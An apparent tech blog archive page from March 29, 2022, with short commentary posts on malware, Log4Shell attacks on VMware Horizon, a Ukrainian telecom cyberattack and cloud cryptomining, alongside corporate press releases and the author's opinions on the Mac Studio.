Archive for March 29, 2022

Researchers Uncover A New Malware Loader Called Verblecon 

Posted in Commentary with tags on March 29, 2022 by itnerd

Security researchers at Symantec published a technical report today on a new malware loader tracked as Verblecon, which has escaped detection due to the polymorphic nature of their code. In other words, it changes itself to evade your typical antivirus product. The malware has been observed being used in attacks that install cryptocurrency miners on compromised machines.

Chris Olson, CEO of The Media Trust, had this to say:

 “Polymorphic techniques are just another way to hide malicious intentions, along with checks for security tools and live environments. What’s interesting is this attack provides another example of how the risks of Web 2.0 are being replicated in Web 3.0. Today’s embryonic beginnings of Web 3.0 are eerily reminiscent of the Web as it existed in the 1990s, showing sporadic signs of vulnerability that may well foreshadow a future era of cyber chaos. To prevent that from happening, we must learn from our past mistakes. Today’s digital ecosystem is riddled with threats because Web 2.0 was not designed for cybersecurity from the outset. Untrusted third parties were allowed to proliferate, leading to phishing attacks, malicious advertising, rampant data privacy abuse and other threats that are hard to fix in the present. With Web 3.0, we have a chance to account for potential attack vectors by design – otherwise, the same issues will replicate themselves with greater potency than ever.”

Symantec appears to currently protect their users from this threat. But one wonders how long that will be the case. And I honestly don’t want to take any bets on that.

1 Comment »

Log4Shell Exploited To Infect VMware Horizon Instances

Posted in Commentary with tags on March 29, 2022 by itnerd

Last year, I wrote about Log4Shell being actively exploited by threat actors to deliver malware and crypto miners. And that trend appears to be continuing as Sophos researchers warned today that Log4Shell is being exploited to infect VMware Horizon servers with backdoors and crypto miners. According to the report, the Log4Shell attacks target unpatched VMware Horizon with three different backdoors and four cryptocurrency miners.

In late December 2021 and in January 2022, there were multiple reports of active exploitation of the Log4Shell vulnerability in VMware Horizon servers. The attack used the Lightweight Directory Access Protocol resource call of Log4J to retrieve a malicious Java class file that modified existing legitimate Java code, adding a web shell that provided remote access and code execution to the attackers.  SophosLabs has observed these attacks in customer telemetry since the beginning of January.

The attempts to leverage Horizon, which continued and grew in number throughout January, were frequently associated with attempts to deploy cryptocurrency mining malware; others had less clear motives, and may be associated with initial access brokers or ransomware actors. These attacks continue.

So in short, you need to patch all the things to protect yourself… But:

Attempts to compromise Horizon servers are among the more targeted exploits of Log4Shell vulnerabilities because of their nature. VMware has pushed out patched versions of Horizon as of March 8 2022, but many organizations may still not have deployed the fixed versions or applied workarounds to vulnerable ones. Even if they have, as demonstrated by the backdoors and reverse shell activity we found, those systems may already be compromised in other ways.

That’s not good. I have a comment on this from Saryu Nayyar, CEO and Founder of Gurucul:

“Similar to Cobalt Strike, this is an example of an assessment tool being weaponized by threat actors to breach organizations. It is critical to employ self-training machine learning and behavioral models to identify exploitation of the exposed vulnerability as well as detect the remote surveillance done by the attackers. Current XDR and traditional SIEM solutions, even with claims of User Entity Behavior Analytics rooted in known patterns and rule-based artificial intelligence, are unable to adapt to these methods. Organizations need to invest in solutions that employ transparent non rule-based machine learning models to more rapidly identify new attacks.”

So not only should you patch everything that runs VMware Horizon, but you should also go over your infrastructure with a fine tooth comb because the bad guys may already be in the door.

Leave a comment »

LinkedIn Welcomes Members of Paddle HR To Accelerate The Development Of LinkedIn Learning Hub

Posted in Commentary with tags on March 29, 2022 by itnerd

In the era of the Great Reshuffle, retaining employees has arguably never been more important. When employees feel like their skills aren’t being put to use, they are 10x more likely to leave a job, making opportunities for career development and growth at a company that much more critical. 

To further help businesses retain their talent, LinkedIn is announcing that members of the Paddle HR team, including CEO, Pat Whelan and CTO, Sid Bhargava, will be joining LinkedIn.

The team at Paddle HR have deep domain expertise building internal talent mobility and career development solutions that are AI-driven, and they share a similar vision – to make skills the currency of the talent ecosystem.

By bringing the team onboard, LinkedIn can accelerate the work they’re doing to build career development and internal mobility capability within LinkedIn Learning Hub – a skill-building platform – to empower employees to accelerate their careers and help employers better retain their talent.

You can read the full announcement here.

Leave a comment »

Procore’s Annual ROI Report Reveals Significant Customer Benefits Surrounding Sustainability, Safety And The Labor Shortage In Construction

Posted in Commentary with tags on March 29, 2022 by itnerd

Procore Technologies, Inc., a leading global provider of construction management software, today released the results of its 2022 Customer Return On Invest (ROI) report. The report explores how the Procore platform is helping customers tackle the most daunting challenges in the industry, including sustainability, safety and the labour shortage by analyzing responses from 2,600+ customers across North and South America, Asia and Europe. Key takeaways include:

  • Building Scalable Businesses: Customer respondents state that using Procore enables their project teams to manage 48 per cent more construction volume per person, on average.
  • Reduced Rework: 75 per cent of respondents agree Procore has helped reduce the amount of rework.
  • Improved Efficiency: Customer respondents reported saving an average of 15 days on the overall schedule on a typical project.
  • Safer Jobsites: 79 per cent of customer respondents that use Quality and Safety agree Procore has improved their company’s safety programs.

Rising material costs and supply chain issues, labour shortages, slimming margins, continued project delays, increasing carbon emissions due to rework and waste and the need for more sustainable solutions are just a few obstacles the industry is facing and will continue to face in the years to come.

Key takeaways and supporting customer responses can be found below:

Building Scalable Businesses: Customer respondents believe using Procore enables their project teams to manage on average 48 per cent more construction volume per person.

Reduced Rework: 75 per cent of customer respondents agree Procore has helped reduce the amount of rework taking place on their projects which leads to less carbon waste, more efficiency and delivering more projects on-time and on-budget.

Improved Efficiency: Customer respondents reported saving an average of 15 days on the overall schedule on a typical project.

Safer Jobsites: 79 per cent of customer respondents that use Quality and Safety agree Procore has improved their company’s safety program.

Procore’s sole focus is construction, from preconstruction to closeout, the Procore platform is purpose-built and developed to meet the needs of the construction industry. Continually recognized with top honours by leading user review sites such as G2, the Procore platform helps customers produce more value, deliver better project outcomes, and develop stronger, safer, and more productive teams.

To discover the tools that are driving results for construction leaders across the globe, download the Procore 2022 ROI Report today.

1 Comment »

Ukraine’s Biggest Telco Hit By “Powerful” Cyberattack

Posted in Commentary with tags on March 29, 2022 by itnerd

The war in Ukraine is clearly shifting to cyberspace as news is filtering out that Ukraine’s biggest telco has been hit by a “Powerful” cyberattack:

Ukraine’s state-owned telecommunications company Ukrtelecom experienced a disruption in internet service on Monday after a “powerful” cyberattack, according to Ukrainian government officials and company representatives.

The incident is the latest hacking attack against Ukrainian internet services since Russian military forces invaded in late February.

“Today, the enemy launched a powerful cyberattack against Ukrtelecom’s IT-infrastructure,” said Yurii Shchyhol, chairman of the State Service of Special Communication and Information Protection of Ukraine. “The attack was repelled. And now Ukrtelecom has an ability to begin restoring its services to the clients.”

“Currently, the attack is repulsed, the provision of services is gradually resumed,” said Ukrtelecom spokesperson Mikhail Shuranov.

Toby Lewis, Darktrace’s Global Head of Threat Analysis provided me with this analysis:

In what is being dubbed ‘World War Wired,’ it is no surprise that Russian cyber-attackers have targeted a major Ukrainian internet provider. Yet, while there has been some disruption to the ISP’s traffic, internet connectivity and cellular networks are largely still operable across the country. This attack has not achieved its desired level of disruption.

A lot of the discussion has focused on Russia’s offensive cyber power, but not enough time has been spent talking about Ukraine’s strong defense. Since the infamous 2015 cyber-attack on the Ukrainian power grid, Ukraine has made significant efforts to build up cyber-defenses, particularly around its critical infrastructure, and ensure resilience in future attacks. This strategy should come as no surprise to global cyber-defenders. Some intelligence even indicates alleged covert operations involving United States military personnel and private-sector engineers throughout 2021 to protect Ukraine against expected cyber-intrusions from Russian-sponsored proxies.

With little information available about the apparent DDoS attack on Ukrtelecom, the provider appears to be prioritizing critical infrastructure and managing disruption through their incident response. Like other Ukrainian organizations facing the threat of Russian cyber-aggression since 2015, it has had no choice but to develop effective cyber-defenses.

The era of they hybrid war is upon us. Which means that we will likely see more of this in Ukraine and beyond in the coming days or weeks. Thus it means that we all need to be prepared to deal with these attacks when they arrive.

Leave a comment »

TELUS Health Acquires Sprout Wellness Solutions

Posted in Commentary with tags on March 29, 2022 by itnerd

TELUS Health today announced it has acquired Sprout Wellness Solutions, a holistic digital health and wellness solution designed to educate, engage and inspire people to improve their health through behaviour change. The solution will be available as part of the TELUS Health suite of services for Canadian employers to empower their employees, through their benefits plan, to live healthier lives.

Built using machine learning and cognitive behavioural science, the Sprout platform encourages, measures, and rewards healthy behaviours through:

  • Real-time health risk assessment;
  • Wearable device integrations and activity tracking;
  • Engaging health and wellness content;
  • Dynamic goals, gamified challenges, and more.

As an early investor in Sprout since 2015, TELUS recognized the positive influence the innovative health solution had on overall health and wellness, helping employees to shift their mindset to more proactively focus on improving their overall health and happiness.

As organizations increasingly seek to embrace more digital well-being empowerment tools for their team members, this acquisition allows TELUS Health to deliver a broader suite of options to complement its established services such as virtual care, virtual pharmacy, and medical and mental health clinics to support Canada’s workforce at every step of their health journey.

Sprout will continue to be available for all its current customers. Over the coming months, TELUS Health will integrate Sprout Wellness Solutions into its Virtual Care service, making it available as a value-added solution to clients nationally in English and French.

Employers who are interested in learning more about how Sprout can improve the health and well-being of their employees by being added to their benefits plans can request information here.

Leave a comment »

Cloud Systems Are The New Battleground For Crypto Mining Threat Actors Says Trend Micro

Posted in Commentary with tags on March 29, 2022 by itnerd

Trend Micro today announced a new report revealing a fierce, hour-by-hour battle for resources among malicious cryptocurrency mining groups.

To read a full copy of the report, A Floating Battleground Navigating the Landscape of Cloud-Based Cryptocurrency Mining, please visit: https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/probing-the-activities-of-cloud-based-cryptocurrency-mining-groups

Threat actors are increasingly scanning for and exploiting these exposed instances, as well as brute-forcing SecureShell (SSH) credentials, in order to compromise cloud assets for cryptocurrency mining, the report reveals. Targets are often characterized by having outdated cloud software in the cloud environment, poor cloud security hygiene, or inadequate knowledge on how to secure cloud services and thus easily exploited by threat actors to gain access to the systems. 

Cloud computing investments have surged during the pandemic. But the ease with which new assets can be deployed has also left many cloud instances online for longer than needed—unpatched and misconfigured.

On one hand, this extra computing workload threatens to slow key user-facing services for victim organizations, as well as increasing operating costs by up to 600% for every infected system.

Crypto mining can also be a precursor to more serious compromise. Many mature threat actors deploy mining software to generate additional revenue before online buyers purchase access for ransomware, data theft, and more.

The Trend Micro report details the activity of multiple threat actor groups in this space, including:

  • Outlaw, which compromises IoT devices and Linux cloud servers by exploiting known vulnerabilities or performing brute-force SSH attacks.
  • TeamTNT, which exploits vulnerable software to compromise hosts before stealing credentials for other services to help it move around to new hosts and abuse any misconfigured services.
  • Kinsing, which sets up an XMRig kit for mining Monero and kicks any other miners off a victim system.
  • 8220, which has been observed fighting Kinsing over the same resources. They frequently eject each other from a host and then install their own cryptocurrency miners.
  • Kek Security, which has been associated with IoT malware and running botnet services.

To mitigate the threat from cryptocurrency mining attacks in the cloud, Trend Micro recommends organizations to:

  • Ensure systems are up-to-date and running only the required services
  • Deploy firewall, IDS/IPS, and cloud endpoint security to limit and filter network traffic to and from known bad hosts
  • Eliminate configuration errors via Cloud Security Posture Management tools
  • Monitor traffic to and from cloud instances and filter out domains associated with known mining pools
  • Deploy rules that monitor open ports, changes to DNS routing, and utilization of CPU resources from a cost perspective

Leave a comment »

Guest Post: Conversation Hijacking Doubles In 2021 Says Atlas VPN

Posted in Commentary with tags on March 29, 2022 by itnerd

Users are frequently aware of plain phishing schemes and do not open any fraudulent links or attachments, especially when they appear out of nowhere and with no context. However, conversation hijacking is an advanced type of phishing attack where fraudsters use already existing conversations to spread malware or extract money from the victims.

These attacks tend to be much more effective because the message comes as part of an ongoing email chain, so it doesn’t look as suspicious as an unexpected email coming out of nowhere and asking for you to pay an invoice or download an attachment to view supposedly important documents.

Even though conversation hijacking attacks are much less common than usual phishing attacks, they still happen thousands of times every month. 

Analysis by Atlas VPN reveals that conversation hijacking attacks more than doubled in 2021 surging from 5,106 in Q1 2021 to 12,606 in Q4 2021, representing a growth of 147% for the period. The data for the analysis on conversation hijacking attacks was provided by Baraccuda, a worldwide leader in online security. 

Interestingly, the most dramatic increase happened from Q1 2021 to Q2 2021, where the volume of attacks surged by 101% in a quarter. 

The volume of attacks continued to rise throughout the year but at a much slower pace. 

Looking at the volume of attacks from another angle, businesses globally encountered an average of 137 conversation hijacking attacks per day in Q4 2021.

To read the full article, head over to: https://atlasvpn.com/blog/conversation-hijacking-doubles-in-2021

Leave a comment »

My Thoughts On The Mac Studio Two Weeks After It Was Announced

Posted in Commentary on March 29, 2022 by itnerd

It’s been a couple of weeks or so since Apple announced the Mac Studio. And there’s three recurring themes that seem to be popping up in my inbox and Twitter that I’d like to comment on.

  • If you’re not a professional, you probably shouldn’t buy the Mac Studio: First let’s define professional. I define that as someone who makes a living doing things like editing video or photos. Or perhaps its someone who does 3D modelling or rendering. Or someone who runs large mathematical models every day. In other words, it’s someone who living revolves around the saying “time is money”. If that’s you, then the Mac Studio is for you. At least until the new Mac Pro with Apple Silicon appears. For everybody else, the fact is that if you need an Apple desktop, the M1 iMac or the M1 Mac Mini are both very good computers with a lot of power. So if you’re in that camp, save a few bucks and skip the Mac Mini.
  • Why does Apple have removable drives if they don’t plan on letting you upgrade your Mac Studio: This became a issue of sorts when the first Mac Studio units started appearing, and YouTube channel MaxTech did a teardown and discovered that the Mac Studio had removable storage in the form of two slots. One unused in his case. Then YouTuber Luke Miani did two videos attempting and failing to upgrade the storage on the Mac Studio, which turned into a rant about “right to repair.” The fact is that Apple says that the Mac Studio isn’t upgradable. And unless some above genius level IQ type comes up with an upgrade kit that works. Or Apple actually offers one the way they do with the Mac Pro, I would take them at the word and assume that upgradability is a bonus if it ever happens and not an expectation. To go further, if you need upgradability, my advice is to wait until the upcoming Apple Silicon Mac Pro and see what that brings to the table. Finally, my thinking is that the non-existent upgradability is not because of some evil Apple plot. I suspect that it’s because of the following reasons:
    • Apple has removable slots for the storage because it likely costs them way less to have one or two motherboard part numbers as opposed to say 10 of them with every storage configuration and processor configuration. Less cost means more profit for Apple.
    • Apple likely needs both slots to facilitate 8TB (or perhaps even 4TB) of storage by using two storage modules and using RAID 0 to stripe them so that they show up as 1 volume. If they don’t need the second slot, it stays empty.
    • Various YouTubers call these storage modules SSD’s. I’ve been told by Apple Genius Bar employees that I know that they are not SSDs. They are NAND storage modules which are controlled by the storage controller that is built into the M1 Max or M1 Ultra processor. Without going way into the weeds, these storage modules have no intelligence on them. They’re simply storage. But the use of these specific modules give the Mac Studio the insanely fast disk read and write speeds that they are capable of. It also means that without a whole lot of gymnastics, upgrades are likely a non-starter. Or at the very least they will require the same sort of gymnastics that the Mac Pro upgrade kit requires. Because unlike SSDs, these storage modules are likely tied to the logic board in some way. If I had to make a guess, I suspect that Apple did this for security reasons and not to screw their customer base over.
    • Finally, unlike say a 16″ MacBook Pro, the Mac Studio is sitting on a desk and typically not moving. In a portable use case, soldering the storage modules to the logic board eliminates issues due to vibration. Since the Mac Studio isn’t moving, this likely didn’t make sense. Thus it has slots.
  • Apple says that the Mac Studio and the M1 Ultra Chip should beat an Nvidia RTX 3090, but it doesn’t: Various websites and YouTubers have run benchmarks on the M1 Ultra equipped Mac Studio and can’t figure out how Apple was able to make the claims that it did in the event where the Mac Studio was announced. I can see two reasons for that. The first is that Apple is lying. And I have to throw this out there as a possibility even though I can’t see that as being factual because that’s a great way for Apple to get a class action lawsuit served up to them that they won’t win. Which brings me to my second reason. The benchmark tests simply don’t push the machine hard enough for you to see the true power of the computer. And that’s the thing about benchmark tests. They’re synthetic and only are great tools for figuring out how fast a computer is or isn’t, until they aren’t good at doing that. Ditto for applications which may require updates to fully use the power of the M1 Ultra. And this article supports that based on looking at this whole issue and going deep into the weeds to explain why people are seeing the benchmark results that they are. So the take home message is that you should use benchmark results as a guide, but not as an absolute.

So those are my thoughts on the Mac Studio a couple of weeks after it was announced. What are your thoughts. Please post them in the comments and let me know what you think.

Leave a comment »

Exclusive Networks Announces Partnership With F5

Posted in Commentary with tags on March 29, 2022 by itnerd

Exclusive Networks, a global trusted cybersecurity specialist for digital infrastructure, announced its new partnership with F5, one of the world’s leading multi-cloud application security and delivery companies. The new partnership will extend Exclusive Networks’ reach, through the expertise of Nuaware subsidiary, into the North American market and give regional customers access to F5’s complete portfolio, including BIG-IP, NGINX and the recently announced F5 Distributed Cloud Services.

Together, Exclusive Networks with Nuaware’s cloud native software expertise, F5 will infuse the current technical landscape with innovative solutions needed to advance their customers’ enterprise security. These bundled product offerings not only help keep organizations safe and secure against today’s cyberthreats, but also enable customers to focus more on their core business and goals.

One major factor bringing F5 to Exclusive Networks was the latter company’s late 2020 acquisition of Nuaware, a specialized leading distributor in Containerization, DevOps / DevSecOps, Cloud and Cloud Native Software technologies that, like its parent company, provides customers with the right products, training, and a specialized partner ecosystem. In the end, it’s Nuaware’s expertise and role as Exclusive Networks’ cloud native software center of excellence that creates the perfect alignment for F5 and its portfolio of products.

With an already existing foothold in the EMEA and APAC regions, adding F5’s enterprise solutions and services and respected reputation to its long list of existing partnerships, Exclusive Networks, with Nuaware, will continue to fortify its position as a global cybersecurity leader. Partnerships, like F5’s, enable Exclusive Networks to build best-of-breed solutions for customers from its extensive catalog of vendor products and services.

Exclusive Networks will offer:

  • BIG-IP: A portfolio of cloud, virtualized and physical appliances and services providing enterprises with availability, performance and security. BIG-IP solutions include DNS hyperscale and security (BIG-IP DNS), threat prevention and management (BIG-IP Advanced Firewall Manager), and user access management and security (BIG-IP Access Policy Manager). 
  • F5 Distributed Cloud Services: F5 Distributed Cloud Services provide security, multi-cloud networking, and edge-based computing solutions on a unified software-as-a-service (SaaS) platform. These services are centrally managed but can be deployed anywhere the app needs to be to maximize business impact and deliver a superior customer experience. 
  • NGINX: NGINX provides a lightweight and flexible platform for high-performance app delivery and security services spanning from monoliths to microservices. NGINX products include application delivery and API management (NGINX Controller), load balancing and API gateway (NGINX Plus), DevOps security solutions (NGINX App Protect) and secure service-to-service traffic management (NGINX Service Mesh).

Exclusive Networks’ commitment to F5 will not only benefit customers facing the challenges of multi-cloud deployments and adaptive applications, but will also energize the onboarding of existing and net new Exclusive Networks’ partners, presenting them with new and extended opportunities within the competitive cybersecurity market.

Before its partnership with F5, Exclusive Networks was already a leading cybersecurity distributor and solution provider in an ever-growing global market. Now, with the F5 partnership and its expansion into North America, Exclusive Networks increases its lead as a forward-moving driving force, passing its competitors by providing customers with its best-of-breed bundle solutions.

Leave a comment »